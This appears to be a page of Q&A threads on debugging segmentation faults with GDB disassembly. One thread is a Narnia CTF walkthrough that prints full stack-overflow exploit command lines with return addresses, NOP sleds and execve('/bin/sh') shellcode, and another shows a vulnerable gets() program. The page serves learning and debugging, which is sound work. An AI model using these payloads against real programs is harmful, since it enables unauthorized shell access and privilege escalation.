Segmentation fault in assembly code + C

I am trying to debug a segmentation fault in my assembly code. Here is the GDB output:
Program received signal SIGSEGV, Segmentation fault.
0x0000000000424c50 in restore_context()
(gdb) disassemble restore_context
Dump of assembler code for function restore_context:
0x0000000000424c44 <+0>: mov 0x8(%rsp),%rax
0x0000000000424c49 <+5>: mov 0x38(%rax),%rsp
0x0000000000424c4d <+9>: mov (%rax),%rdx
=>0x0000000000424c50 <+12>: mov %rdx,(%rsp)
0x0000000000424c54 <+16>: mov 0x18(%rax),%rbx
0x0000000000424c58 <+20>: mov 0x20(%rax),%rsi
0x0000000000424c5c <+24>: mov 0x28(%rax),%rdi
0x0000000000424c60 <+28>: mov 0x30(%rax),%rbp
0x0000000000424c64 <+32>: xor %rax,%rax
0x0000000000424c67 <+35>: retq
End of assembler dump.
From the little research I did, this looks like an overflow error. Can someone tell me how to debug this? How do I find the faulty memory access? Is there a tool to inspect this, or is there an error in my assembly code?
Here is the assembly code as well:
.align 4,0x90
.global restore_context
.type restore_context,@function
restore_context:
mov 8(%rsp),%rax
mov 56(%rax), %rsp
mov 0(%rax),%rdx /* Fetch our return address */
mov %rdx, 0(%rsp) /* Save our return address */ // overflow
mov 24(%rax),%rbx
mov 32(%rax), %rsi
mov 40(%rax), %rdi
mov 48(%rax), %rbp
xor %rax,%rax
ret
This is the counterpart store_context()
.align 4,0x90
.global store_context
.type store_context,@function
store_context:
mov 8(%rsp),%rax
mov %rbx, 24(%rax)
mov %rsi, 32(%rax)
mov %rdi, 40(%rax)
mov %rbp, 48(%rax)
mov %rsp, 56(%rax)
mov 0(%rsp), %rdx
mov %rdx, 0(%rax)
xor %rax,%rax
inc %rax
ret
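A hedged note on debugging this: both routines fetch their argument with mov 8(%rsp),%rax, which is how a stack-passed argument would be located. If they are called from C under the System V x86-64 calling convention (an assumption, since the caller is not shown), the first pointer argument arrives in %rdi instead. In that case %rax may hold an unrelated value and the %rsp loaded from 56(%rax) may point at unmapped memory, which would match a fault on mov %rdx,(%rsp). In gdb, `info registers rax rsp` at the faulting instruction and `x/8gx $rax` show whether the context block looks sane. For a known-good baseline to compare against, the same save/restore round trip can be sketched with the standard setjmp/longjmp. The function name below is made up for illustration.

```c
#include <assert.h>
#include <setjmp.h>

/* Hypothetical helper: saves a context, jumps back to it once, and
 * reports how many times execution passed the save point. */
int context_round_trip(void)
{
    jmp_buf ctx;
    volatile int passes = 0;   /* volatile: modified between setjmp and longjmp */

    if (setjmp(ctx) == 0) {    /* first return: context has been stored */
        passes++;
        longjmp(ctx, 1);       /* restore: setjmp returns again, now with 1 */
    }
    passes++;                  /* reached only after the restore */
    assert(passes == 2);
    return passes;
}
```

Like store_context() and restore_context(), setjmp distinguishes the initial save from the later restore by its return value, so the hand-written pair can be checked against this behavior.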

Related

Buffer Overflow strcpy() example from CTF

I come back (yet again) to basic buffer exploitation CTFs, and I have the following vulnerable program from the Narnia CTF on OverTheWire:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char * argv[]){
char buf[128];
if(argc == 1){
printf("Usage: %s argument\n", argv[0]);
exit(1);
}
strcpy(buf,argv[1]);
printf("%s", buf);
return 0;
}
I see that an argument of "A" * 132 causes a segfault.
With anything shorter, the program executes normally.
Dumping main in gdb gives:
0x0804844b <+0>: push %ebp
0x0804844c <+1>: mov %esp,%ebp
0x0804844e <+3>: add $0xffffff80,%esp
0x08048451 <+6>: cmpl $0x1,0x8(%ebp)
0x08048455 <+10>: jne 0x8048471 <main+38>
0x08048457 <+12>: mov 0xc(%ebp),%eax
0x0804845a <+15>: mov (%eax),%eax
0x0804845c <+17>: push %eax
0x0804845d <+18>: push $0x8048520
0x08048462 <+23>: call 0x8048300 <printf@plt>
0x08048467 <+28>: add $0x8,%esp
0x0804846a <+31>: push $0x1
0x0804846c <+33>: call 0x8048320 <exit@plt>
0x08048471 <+38>: mov 0xc(%ebp),%eax
0x08048474 <+41>: add $0x4,%eax
0x08048477 <+44>: mov (%eax),%eax
0x08048479 <+46>: push %eax
0x0804847a <+47>: lea -0x80(%ebp),%eax
0x0804847d <+50>: push %eax
0x0804847e <+51>: call 0x8048310 <strcpy@plt>
0x08048483 <+56>: add $0x8,%esp
0x08048486 <+59>: lea -0x80(%ebp),%eax
0x08048489 <+62>: push %eax
0x0804848a <+63>: push $0x8048534
0x0804848f <+68>: call 0x8048300 <printf@plt>
0x08048494 <+73>: add $0x8,%esp
0x08048497 <+76>: mov $0x0,%eax
0x0804849c <+81>: leave
0x0804849d <+82>: ret
My idea is to take control of the instruction pointer and make it point to my shellcode. There is no stack canary.
With gdb, I set a breakpoint at *0x0804849c and see that EIP before returning is 0x804849c.
(gdb) i r
eax 0x0 0
ecx 0x7fffffe6 2147483622
edx 0xf7fc6870 -134453136
ebx 0x0 0
esp 0xffffd628 0xffffd628
ebp 0xffffd6a8 0xffffd6a8
esi 0x2 2
edi 0xf7fc5000 -134459392
eip 0x804849c 0x804849c <main+81>
When I overflow with "A" * 132, run the program again, and step past the breakpoint, I see EBP is filled with "A"s.
(gdb) i r
eax 0x0 0
ecx 0x7fffff7b 2147483515
edx 0xf7fc6870 -134453136
ebx 0x0 0
esp 0xffffd640 0xffffd640
ebp 0x41414141 0x41414141
When running again with extra bytes (136 in total), I see I am able to take control over EIP.
(gdb) i r
eax 0x0 0
ecx 0x7fffff7b 2147483515
edx 0xf7fc6870 -134453136
ebx 0x0 0
esp 0xffffd640 0xffffd640
ebp 0x41414141 0x41414141
-----> 0x41414141 in ?? ()
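The 132 and 136 byte thresholds follow from the frame layout in the disassembly: buf is at -0x80(%ebp), the saved EBP sits at the address EBP points to, and the return address is one 4-byte word above that. A small sketch of the arithmetic, with made-up helper names and a 4-byte word size assumed for 32-bit x86:

```c
#include <assert.h>
#include <stddef.h>

enum { WORD_SIZE = 4 };   /* 32-bit x86: saved EBP and return address are 4 bytes each */

/* Offset from the start of the buffer to the saved EBP. */
size_t saved_ebp_offset(size_t buf_below_ebp)
{
    assert(buf_below_ebp > 0);   /* the buffer must lie below EBP */
    return buf_below_ebp;
}

/* Offset from the start of the buffer to the return address. */
size_t ret_addr_offset(size_t buf_below_ebp)
{
    return saved_ebp_offset(buf_below_ebp) + WORD_SIZE;
}

/* Number of input bytes needed to overwrite the whole return address. */
size_t bytes_to_control_eip(size_t buf_below_ebp)
{
    return ret_addr_offset(buf_below_ebp) + WORD_SIZE;
}
```

With buf_below_ebp = 0x80, the saved EBP starts at offset 128 and the return address at offset 132. So 132 bytes of "A" fill EBP with 0x41414141, and the terminating NUL written by strcpy lands on the first byte of the return address. 136 bytes overwrite the return address completely.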
So, I craft my payload as follows:
buffer points to nops
[ PADDING ] + [ EIP + 4 ] + [ NOP SLED ] + [ SHELLCODE ]
AAAAAA.. \x0c\xd6\xff\xff \x90 * 48 + n length shellcode
`python -c "print('A' * 132 + '\x0c\xd6\xff\xff' + '\x90'*48 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80')"`
My questions are:
I noticed that I had to arbitrarily lengthen the NOP sled for this to work. For example, the payload worked in gdb with as few as 10 NOPs, while in the shell exactly 48 were needed. What is the reason for this?
I also noticed that depending on the shellcode length, there were more or less NOPs needed. For example, the following payload worked with exactly 78 NOPs outside of gdb:
./narnia2 `python -c "print('A' * 132 + '\x0c\xd6\xff\xff' + '\x90'*100 + '\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80')"`
Anything less returns SIGILL, Illegal instruction.
Meanwhile, on GDB, that same payload only took 30 NOPs
Another question is, why are NOPs necessary? If I provide a payload with no NOPs and inspect the instructions after leave, I see:
0xffffd60c in ?? () (the address in our payload, where we pointed eip to)
(gdb) x/20i 0xffffd60c
=> 0xffffd60c: inc %ecx
0xffffd60d: inc %ecx
0xffffd60e: inc %ecx
0xffffd60f: inc %ecx
0xffffd610: inc %ecx
0xffffd611: inc %ecx
0xffffd612: inc %ecx
0xffffd613: inc %ecx
0xffffd614: inc %ecx
0xffffd615: inc %ecx
0xffffd616: inc %ecx
...
0xffffd61e: (bad)
If I, however, specify the NOPs and run the program again:
(gdb) x/20i 0xffffd60c
=> 0xffffd60c: nop
0xffffd60d: nop
0xffffd60e: nop
0xffffd60f: nop
0xffffd610: nop
0xffffd611: nop
0xffffd612: nop
0xffffd613: nop
0xffffd614: nop
0xffffd615: nop
0xffffd616: nop
0xffffd617: nop
0xffffd618: nop
0xffffd619: nop
0xffffd61a: nop
0xffffd61b: nop
0xffffd61c: nop
0xffffd61d: nop
0xffffd61e: nop
0xffffd61f: nop
(gdb)
0xffffd620: cltd This is the shellcode!
0xffffd621: mul %edx
0xffffd623: lea (%eax),%ecx
0xffffd625: mov $0x68732f2f,%esi
0xffffd62a: mov $0x6e69622f,%edi
0xffffd62f: push %ecx
0xffffd630: push %esi
0xffffd631: push %edi
0xffffd632: lea (%esp),%ebx
0xffffd635: mov $0xb,%al
0xffffd637: int $0x80
: Shellcode in question :
Finally, I was looking if there was an actual way of switching the payload order. Specifically, what if the payload looks like:
[PADDING NOP SLED - SHELLCODE.LEN ] + SHELLCODE + EIP
EIP points to the start of the buffer, so it points to our NOP SLED, and eventually executes the shellcode. Is this possible?
I noticed the buffer starts at 0xffffd618. The payload becomes:
#~: ./narnia2 `python -c "print('\x90'*107 + '\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80' + '\x18\xd6\xff\xff')"`
Inspecting in GDB,
(gdb) x/20i 0xffffd618
=> 0xffffd618: nop
0xffffd619: nop
0xffffd61a: nop
0xffffd61b: nop
0xffffd61c: nop
0xffffd61d: nop
0xffffd61e: nop
0xffffd61f: nop
0xffffd620: nop
0xffffd621: nop
0xffffd622: nop
0xffffd623: cltd That's the shellcode again!
0xffffd624: mul %edx
0xffffd626: lea (%eax),%ecx
0xffffd628: mov $0x68732f2f,%esi
0xffffd62d: mov $0x6e69622f,%edi
0xffffd632: push %ecx
0xffffd633: push %esi
0xffffd634: push %edi
0xffffd635: lea (%esp),%ebx
(gdb)
0xffffd638: mov $0xb,%al
0xffffd63a: int $0x80
0xffffd63c: sbb %dl,%dh
0xffffd63e: (bad) uh oh
The program eventually segfaults, specifically, at 0xffffd635. What is the reason for this?
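One likely explanation, offered as a hedged sketch: after ret, ESP points just past the overwritten return address, and in this layout the shellcode sits directly below it, so the shellcode's own push instructions write over its tail. The dump shows the return address bytes at 0xffffd63c (the `sbb %dl,%dh` line decodes the bytes 18 d6 ff ff), which would put ESP at 0xffffd640 after ret. That value is inferred from the dump, not read from a register listing of this run. The helper names are made up.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

enum { WORD_SIZE = 4 };   /* each 32-bit push moves ESP down by 4 bytes */

/* Lowest address written after `pushes` pushes starting from `esp`. */
uint32_t lowest_pushed_addr(uint32_t esp, unsigned pushes)
{
    assert(esp >= pushes * WORD_SIZE);
    return esp - pushes * WORD_SIZE;
}

/* True if the pushed region [low, esp) overlaps the code in
 * [code_start, code_end). */
bool pushes_clobber_code(uint32_t esp, unsigned pushes,
                         uint32_t code_start, uint32_t code_end)
{
    uint32_t low = lowest_pushed_addr(esp, pushes);
    return low < code_end && code_start < esp;
}
```

With ESP at 0xffffd640 and the three pushes in the shellcode (%ecx, %esi, %edi), the last push writes to 0xffffd634 through 0xffffd637, which covers the instruction at 0xffffd635 where the fault is reported. In the first layout the shellcode sits above the return address, so the pushes land below the code and do not touch it.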

Core dump when calling another function

Our nginx server dumps core with relatively low probability after we modified some code; it crashes when calling another function. I'm not sure what the direct cause is. For example, nginx may have tried to read or write an invalid memory address, but what is the exact address and how can I find it?
Here are the last frames:
(gdb) bt
#0 0x00000000004e9bb8 in ngx_http_trailers_filter (r=0x1128e350, in=0x7ffe64678c60)
at src/http/modules/ngx_http_headers_filter_module.c:264
#1 0x0000000000539754 in ngx_http_jflv_body_filter (r=0x1128e350, in=0x7ffe64678c60) at addon/jflv/ngx_http_jflv_module.c:263
#2 0x000000000053c931 in ngx_http_jbilling_body_filter (r=0x1128e350, in=0x7ffe64678c60)
at addon/jbilling/ngx_http_jbilling_module.c:2192
#3 0x000000000053fef1 in ngx_http_jbilling_body_filter (r=0x1128e350, in=0x7ffe64678c60)
at addon/thirdparty_billing/ngx_http_thirdparty_billing_module.c:2111
#4 0x0000000000549690 in ngx_http_sub_grep_body_filter (r=0x1128e350, in=0x7ffe64678c60)
at addon/sub_grep_filter/ngx_http_sub_grep_filter_module.c:299
#5 0x000000000052cd5f in ngx_http_upstream_jconhash_body_filter (r=0x1128e350, chain=0x7ffe64678c60)
at addon/upstream_jconhash/ngx_http_upstream_jconhash_module.c:1664
#6 0x00000000005310c3 in ngx_http_upstream_lb_chash_body_filter (r=0x1128e350, chain=0x7ffe64678c60)
at addon/upstream_lb_chash/chash/ngx_http_upstream_lb_chash_module.c:993
#7 0x000000000053cc93 in ngx_http_file_signature_body_filter (r=0x1128e350, in=0x7ffe64678c60)
at addon/file_signature_filter/ngx_http_file_signature_filter_module.c:203
#8 0x000000000054b1a8 in ngx_http_trim_body_filter (r=0x1128e350, in=<optimized out>)
at addon/jtrim/ngx_http_trim_filter_module.c:365
The code near src/http/modules/ngx_http_headers_filter_module.c:264:
static ngx_int_t
ngx_http_trailers_filter(ngx_http_request_t *r, ngx_chain_t *in)
{
ngx_str_t value;
ngx_uint_t i, safe_status;
ngx_chain_t *cl;
ngx_table_elt_t *t;
ngx_http_header_val_t *h;
ngx_http_headers_conf_t *conf;
conf = ngx_http_get_module_loc_conf(r, ngx_http_headers_filter_module);
if (in == NULL
|| conf->trailers == NULL
|| !r->expect_trailers
|| r->header_only)
{
return ngx_http_next_body_filter(r, in); <== coredump here
}
...
}
I also disassembled the code of the last frame:
(gdb) disassemble
Dump of assembler code for function ngx_http_trailers_filter:
0x00000000004e9aeb <+0>: push %r15
0x00000000004e9aed <+2>: push %r14
0x00000000004e9aef <+4>: push %r13
0x00000000004e9af1 <+6>: push %r12
0x00000000004e9af3 <+8>: push %rbp
0x00000000004e9af4 <+9>: push %rbx
0x00000000004e9af5 <+10>: sub $0x28,%rsp
0x00000000004e9af9 <+14>: mov %rdi,%r12
0x00000000004e9afc <+17>: mov %rsi,%r15
0x00000000004e9aff <+20>: mov 0x28(%rdi),%rax
0x00000000004e9b03 <+24>: mov 0x5e5ed6(%rip),%rdx # 0xacf9e0 <ngx_http_headers_filter_module>
0x00000000004e9b0a <+31>: lea (%rax,%rdx,8),%rax
0x00000000004e9b0e <+35>: test %rsi,%rsi
0x00000000004e9b11 <+38>: je 0x4e9bac <ngx_http_trailers_filter+193>
0x00000000004e9b17 <+44>: mov (%rax),%r14
0x00000000004e9b1a <+47>: mov 0x20(%r14),%rcx
0x00000000004e9b1e <+51>: test %rcx,%rcx
0x00000000004e9b21 <+54>: je 0x4e9bac <ngx_http_trailers_filter+193>
0x00000000004e9b27 <+60>: movzbl 0x511(%rdi),%eax
0x00000000004e9b2e <+67>: and $0xffffffc0,%eax
0x00000000004e9b31 <+70>: cmp $0x80,%al
0x00000000004e9b33 <+72>: jne 0x4e9bac <ngx_http_trailers_filter+193>
0x00000000004e9b35 <+74>: mov (%rsi),%rax
0x00000000004e9b38 <+77>: cmpb $0x0,0x48(%rax)
0x00000000004e9b3c <+81>: js 0x4e9b57 <ngx_http_trailers_filter+108>
0x00000000004e9b3e <+83>: mov %rsi,%rax
0x00000000004e9b41 <+86>: mov 0x8(%rax),%rax
0x00000000004e9b45 <+90>: test %rax,%rax
0x00000000004e9b48 <+93>: je 0x4e9c6d <ngx_http_trailers_filter+386>
0x00000000004e9b4e <+99>: mov (%rax),%rdx
0x00000000004e9b51 <+102>: cmpb $0x0,0x48(%rdx)
0x00000000004e9b55 <+106>: jns 0x4e9b41 <ngx_http_trailers_filter+86>
0x00000000004e9b57 <+108>: mov 0x268(%r12),%rax
0x00000000004e9b5f <+116>: cmp $0xce,%rax
0x00000000004e9b65 <+122>: je 0x4e9bc7 <ngx_http_trailers_filter+220>
0x00000000004e9b67 <+124>: ja 0x4e9c7e <ngx_http_trailers_filter+403>
0x00000000004e9b6d <+130>: mov $0x0,%r13d
0x00000000004e9b73 <+136>: cmp $0xc8,%rax
0x00000000004e9b79 <+142>: jb 0x4e9b97 <ngx_http_trailers_filter+172>
0x00000000004e9b7b <+144>: mov $0x1,%r13d
0x00000000004e9b81 <+150>: cmp $0xc9,%rax
0x00000000004e9b87 <+156>: jbe 0x4e9b97 <ngx_http_trailers_filter+172>
0x00000000004e9b89 <+158>: cmp $0xcc,%rax
0x00000000004e9b8f <+164>: sete %r13b
0x00000000004e9b93 <+168>: movzbl %r13b,%r13d
0x00000000004e9b97 <+172>: mov (%rcx),%rbx
0x00000000004e9b9a <+175>: cmpq $0x0,0x8(%rcx)
0x00000000004e9b9f <+180>: je 0x4e9c44 <ngx_http_trailers_filter+345>
0x00000000004e9ba5 <+186>: mov $0x0,%ebp
0x00000000004e9baa <+191>: jmp 0x4e9c03 <ngx_http_trailers_filter+280>
0x00000000004e9bac <+193>: mov %r15,%rsi
0x00000000004e9baf <+196>: mov %r12,%rdi
0x00000000004e9bb2 <+199>: callq *0x62aa70(%rip) # 0xb14628 <ngx_http_next_body_filter>
=> 0x00000000004e9bb8 <+205>: add $0x28,%rsp
0x00000000004e9bbc <+209>: pop %rbx
0x00000000004e9bbd <+210>: pop %rbp
0x00000000004e9bbe <+211>: pop %r12
0x00000000004e9bc0 <+213>: pop %r13
0x00000000004e9bc2 <+215>: pop %r14
0x00000000004e9bc4 <+217>: pop %r15
0x00000000004e9bc6 <+219>: retq
0x00000000004e9bc7 <+220>: mov $0x1,%r13d
rip points to 0x00000000004e9bb8, so the instruction being executed should be the one at 0x00000000004e9bb2, callq *0x62aa70(%rip). I searched some docs for what the callq instruction does (e.g. https://web.stanford.edu/class/archive/cs/cs107/cs107.1186/guide/x86-64.html), and they say:
The callq instruction takes one operand, the address of the function being called. It pushes the return address (current value of %rip, which is the next instruction after the call) onto the stack and then jumps to the address of the function being called.
It seems it only pushes the return address onto the stack and sets rip to the address of the function being called, so normally it shouldn't make the process dump core.
I also suspect another possibility: the crash actually happens when ngx_http_next_body_filter executes retq.
Because 0x00000000004e9bac (mov %r15,%rsi) and 0x00000000004e9baf (mov %r12,%rdi) had just executed before the crash, %r15 and %rsi should be equal (the in parameter in the source code), and %r12 and %rdi should be equal too (the r parameter in the source code), but the actual register contents are not what we expected:
(gdb) i r
rax 0x0 0
rbx 0x1128e350 287892304
rcx 0x1128e300 287892224
rdx 0x0 0
rsi 0x0 0
rdi 0xbe 190
rbp 0x0 0x0
rsp 0x7ffe64678700 0x7ffe64678700
r8 0xbe 190
r9 0x7ffe64677ec0 140730582924992
r10 0x10d7f170 282587504
r11 0x246 582
r12 0x1128e350 287892304
r13 0x7ffe64678c60 140730582928480
r14 0x3148b28 51677992
r15 0x7ffe64678c60 140730582928480
rip 0x4e9bb8 0x4e9bb8 <ngx_http_trailers_filter+205>
eflags 0x10202 [ IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
So maybe rsi and rdi were modified by ngx_http_next_body_filter, and the crash actually happened when ngx_http_next_body_filter executed retq. Is that possible?
Is there any advice on how to analyse this problem?
I also have other questions:
Normally, what kinds of code would dump core when calling another function?
Are there any docs that explain similar situations?
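For context on what the faulting call site does: callq *0x62aa70(%rip) is an indirect call through the ngx_http_next_body_filter function pointer, which each filter module saves when it installs itself. A minimal sketch of that chaining pattern follows. The types and names are simplified stand-ins, not nginx's real definitions. A call like this can fault if the pointer is corrupted, or if pushing the return address runs off the end of the stack (for example through unbounded recursion). In gdb it may help to inspect the pointer with `x/gx 0xb14628` and the faulting address with `p $_siginfo._sifields._sigfault.si_addr`.

```c
#include <assert.h>
#include <stddef.h>

/* Simplified stand-in for a body filter signature. */
typedef int (*body_filter_pt)(void *request, void *chain);

static body_filter_pt top_body_filter;    /* head of the chain */
static body_filter_pt next_body_filter;   /* saved by the module at init time */

/* Last filter in the chain: does nothing and reports success. */
static int terminal_filter(void *request, void *chain)
{
    (void)request;
    (void)chain;
    return 0;
}

/* A module filter that has nothing to do and forwards to the next one. */
static int passthrough_filter(void *request, void *chain)
{
    assert(next_body_filter != NULL);          /* a corrupted pointer would crash below */
    return next_body_filter(request, chain);   /* compiles to an indirect call */
}

/* Installs the module in front of the existing chain, then runs the chain. */
int run_filter_chain(void)
{
    top_body_filter = terminal_filter;

    next_body_filter = top_body_filter;        /* remember the previous head */
    top_body_filter = passthrough_filter;      /* become the new head */

    return top_body_filter(NULL, NULL);
}
```

Because every module has its own static next pointer, checking the value stored at the address in the disassembly comment against the expected next filter is a quick way to rule out a corrupted pointer.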

Disassembled code for two forms of printf

I am trying to understand the reason for a segfault by looking at the disassembled code.
Case 1.
char *p = NULL;
printf("%s", p);
Output: no crash; it prints null. Looking further at the disassembled code, it shows this:
Dump of assembler code for function printf@plt:
0x00000000004003b8 <+0>: jmpq *0x2004aa(%rip) # 0x600868 <printf@got.plt>
0x00000000004003be <+6>: pushq $0x0
0x00000000004003c3 <+11>: jmpq 0x4003a8
End of assembler dump.
I am trying to go further than this, but I do not know how to move to the next set of instructions or what exactly they do.
Case 2.
int
main()
{
char *p = NULL;
printf("%s\n", p);
}
It leads to seg fault.
Disassemble code:
Dump of assembler code for function main:
0x00000000004004c4 <+0>: push %rbp
0x00000000004004c5 <+1>: mov %rsp,%rbp
0x00000000004004c8 <+4>: sub $0x10,%rsp
0x00000000004004cc <+8>: movq $0x0,-0x8(%rbp)
0x00000000004004d4 <+16>: mov -0x8(%rbp),%rax
0x00000000004004d8 <+20>: mov %rax,%rdi
0x00000000004004db <+23>: callq 0x4003b8 <puts@plt>
0x00000000004004e0 <+28>: leaveq
0x00000000004004e1 <+29>: retq
End of assembler dump.
(gdb) disassemble puts
Dump of assembler code for function puts@plt:
0x00000000004003b8 <+0>: jmpq *0x2004aa(%rip) # 0x600868 <puts@got.plt>
0x00000000004003be <+6>: pushq $0x0
0x00000000004003c3 <+11>: jmpq 0x4003a8
End of assembler dump.
Can you please help me identify which assembler instruction leads to the segfault?
0x00000000004003b8 <+0>: jmpq *0x2004aa(%rip) # 0x600868 <puts@got.plt>
Two important codewords here:
GOT -> Global Offset Table
PLT -> Procedure Linkage Table
This indicates that puts is called from a dynamic library. The address of puts is not known when you disassemble the binary without running it. The program must be run so that the dynamic linker can bind the address of the library function to the PLT slot.
What you need is:
(gdb) start
Temporary breakpoint 1 at 0x40053e: file c.c, line 9.
Starting program: /home/josef/DEVEL/test/test/a.out
Temporary breakpoint 1, main () at c.c:9
9 char *p = NULL;
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400536 <+0>: push %rbp
0x0000000000400537 <+1>: mov %rsp,%rbp
0x000000000040053a <+4>: sub $0x10,%rsp
=> 0x000000000040053e <+8>: movq $0x0,-0x8(%rbp)
0x0000000000400546 <+16>: mov -0x8(%rbp),%rax
0x000000000040054a <+20>: mov %rax,%rdi
0x000000000040054d <+23>: callq 0x400410 <puts@plt>
0x0000000000400552 <+28>: leaveq
0x0000000000400553 <+29>: retq
End of assembler dump.
(gdb) disassemble puts
Dump of assembler code for function _IO_puts:
0x00007ffff7a84d60 <+0>: push %r12
0x00007ffff7a84d62 <+2>: mov %rdi,%r12
0x00007ffff7a84d65 <+5>: push %rbp
0x00007ffff7a84d66 <+6>: push %rbx
0x00007ffff7a84d67 <+7>: callq 0x7ffff7a9d9b0 <strlen>
0x00007ffff7a84d6c <+12>: mov 0x34fafd(%rip),%rbx # 0x7ffff7dd4870 <stdout>
0x00007ffff7a84d73 <+19>: mov %rax,%rbp
0x00007ffff7a84d76 <+22>: mov (%rbx),%eax
0x00007ffff7a84d78 <+24>: mov %rbx,%rdi
0x00007ffff7a84d7b <+27>: and $0x8000,%eax
0x00007ffff7a84d80 <+32>: jne 0x7ffff7a84ddf <_IO_puts+127>
0x00007ffff7a84d82 <+34>: mov 0x88(%rbx),%r8
......
Now you see what is inside puts. You can go further and disassemble strlen:
(gdb) disassemble strlen
Dump of assembler code for function strlen:
0x00007ffff7a9d9b0 <+0>: pxor %xmm8,%xmm8
0x00007ffff7a9d9b5 <+5>: pxor %xmm9,%xmm9
0x00007ffff7a9d9ba <+10>: pxor %xmm10,%xmm10
0x00007ffff7a9d9bf <+15>: pxor %xmm11,%xmm11
0x00007ffff7a9d9c4 <+20>: mov %rdi,%rax
0x00007ffff7a9d9c7 <+23>: mov %rdi,%rcx
0x00007ffff7a9d9ca <+26>: and $0xfff,%rcx
0x00007ffff7a9d9d1 <+33>: cmp $0xfcf,%rcx
0x00007ffff7a9d9d8 <+40>: ja 0x7ffff7a9da40 <strlen+144>
0x00007ffff7a9d9da <+42>: movdqu (%rax),%xmm12
0x00007ffff7a9d9df <+47>: pcmpeqb %xmm8,%xmm12
0x00007ffff7a9d9e4 <+52>: pmovmskb %xmm12,%edx
0x00007ffff7a9d9e9 <+57>: test %edx,%edx
0x00007ffff7a9d9eb <+59>: je 0x7ffff7a9d9f1 <strlen+65>
......
Good luck with analyzing all the code :)
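The disassembly above also explains the difference between the two cases: for printf("%s\n", p) the compiler emitted a call to puts, and puts starts by calling strlen on its argument, which reads through the NULL pointer. Passing NULL for %s is undefined behavior in standard C. glibc's printf happens to print (null), but that is not something to rely on. A small guard, with made-up helper names, avoids both paths:

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper: substitutes a placeholder for a NULL string. */
const char *printable(const char *s)
{
    return s != NULL ? s : "(null)";
}

/* Prints s followed by a newline without ever handing NULL to puts(). */
int print_line(const char *s)
{
    const char *safe = printable(s);
    assert(safe != NULL);
    return puts(safe);   /* puts returns a non-negative value on success */
}
```

Calling print_line(p) with p == NULL then prints the placeholder instead of crashing inside strlen.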

printf and gets not showing in assembler code

I just got started with buffer overflows, and in the tutorials I find, everyone has printf@plt and gets@plt in their assembler code, but I don't see them. Am I doing something wrong?
Source code:
#include <stdio.h>
#include <string.h>
int main()
{
char password[16];
int passcheck = 0;
void secret();
printf("\nWhat's the password?\n");
gets(password);
if (strcmp(password, "password1"))
{
printf("\nYou fail\n");
}
else
{
printf("\nCorrect password\n");
passcheck = 1;
}
if(passcheck)
{
secret();
}
return 0;
}
void secret()
{
printf("\nYou got it!!!\n");
}
assembler code:
0x00001e50 <+0>: push %ebp
0x00001e51 <+1>: mov %esp,%ebp
0x00001e53 <+3>: push %edi
0x00001e54 <+4>: push %esi
0x00001e55 <+5>: sub $0x40,%esp
0x00001e58 <+8>: call 0x1e5d <main+13>
0x00001e5d <+13>: pop %eax
0x00001e5e <+14>: lea 0x101(%eax),%ecx
0x00001e64 <+20>: movl $0x0,-0xc(%ebp)
0x00001e6b <+27>: movl $0x0,-0x20(%ebp)
0x00001e72 <+34>: mov %ecx,(%esp)
0x00001e75 <+37>: mov %eax,-0x24(%ebp)
0x00001e78 <+40>: call 0x1f28
0x00001e7d <+45>: lea -0x1c(%ebp),%ecx
0x00001e80 <+48>: mov %ecx,(%esp)
0x00001e83 <+51>: mov %eax,-0x28(%ebp)
0x00001e86 <+54>: call 0x1f22
0x00001e8b <+59>: lea -0x1c(%ebp),%ecx
0x00001e8e <+62>: mov -0x24(%ebp),%edx
0x00001e91 <+65>: lea 0x118(%edx),%esi
0x00001e97 <+71>: mov %esp,%edi
0x00001e99 <+73>: mov %esi,0x4(%edi)
0x00001e9c <+76>: mov %ecx,(%edi)
0x00001e9e <+78>: mov %eax,-0x2c(%ebp)
0x00001ea1 <+81>: call 0x1f2e
0x00001ea6 <+86>: cmp $0x0,%eax
0x00001ea9 <+89>: je 0x1ec8 <main+120>
0x00001eaf <+95>: mov -0x24(%ebp),%eax
0x00001eb2 <+98>: lea 0x122(%eax),%ecx
0x00001eb8 <+104>: mov %ecx,(%esp)
0x00001ebb <+107>: call 0x1f28
0x00001ec0 <+112>: mov %eax,-0x30(%ebp)
0x00001ec3 <+115>: jmp 0x1ee3 <main+147>
0x00001ec8 <+120>: mov -0x24(%ebp),%eax
0x00001ecb <+123>: lea 0x12e(%eax),%ecx
0x00001ed1 <+129>: mov %ecx,(%esp)
0x00001ed4 <+132>: call 0x1f28
0x00001ed9 <+137>: movl $0x1,-0x20(%ebp)
0x00001ee0 <+144>: mov %eax,-0x34(%ebp)
0x00001ee3 <+147>: cmpl $0x0,-0x20(%ebp)
0x00001ee7 <+151>: je 0x1ef2 <main+162>
0x00001eed <+157>: call 0x1f00 <secret>
0x00001ef2 <+162>: xor %eax,%eax
0x00001ef4 <+164>: add $0x40,%esp
0x00001ef7 <+167>: pop %esi
0x00001ef8 <+168>: pop %edi
0x00001ef9 <+169>: pop %ebp
0x00001efa <+170>: ret
0x00001efb <+171>: nopl 0x0(%eax,%eax,1)
Add debug symbols to your binaries by compiling your C program with the appropriate switch for your C compiler. For example, if you use gcc, use the -g switch. After that you will be able to see the original C symbol names when running your binary under gdb.
Regarding your comment: maybe your object files weren't recompiled from scratch. Try make clean if you use makefiles, or just delete all the object (.o) files, and then recompile your program with the -ggdb switch (it is the same as -g but generates debug info specifically for gdb). After recompiling, look in your binary for debug info: a couple of strings like 'printf@plt' and 'gets@plt'.

Is there a way to tell GCC not to reorder any instructions, not just load/stores?

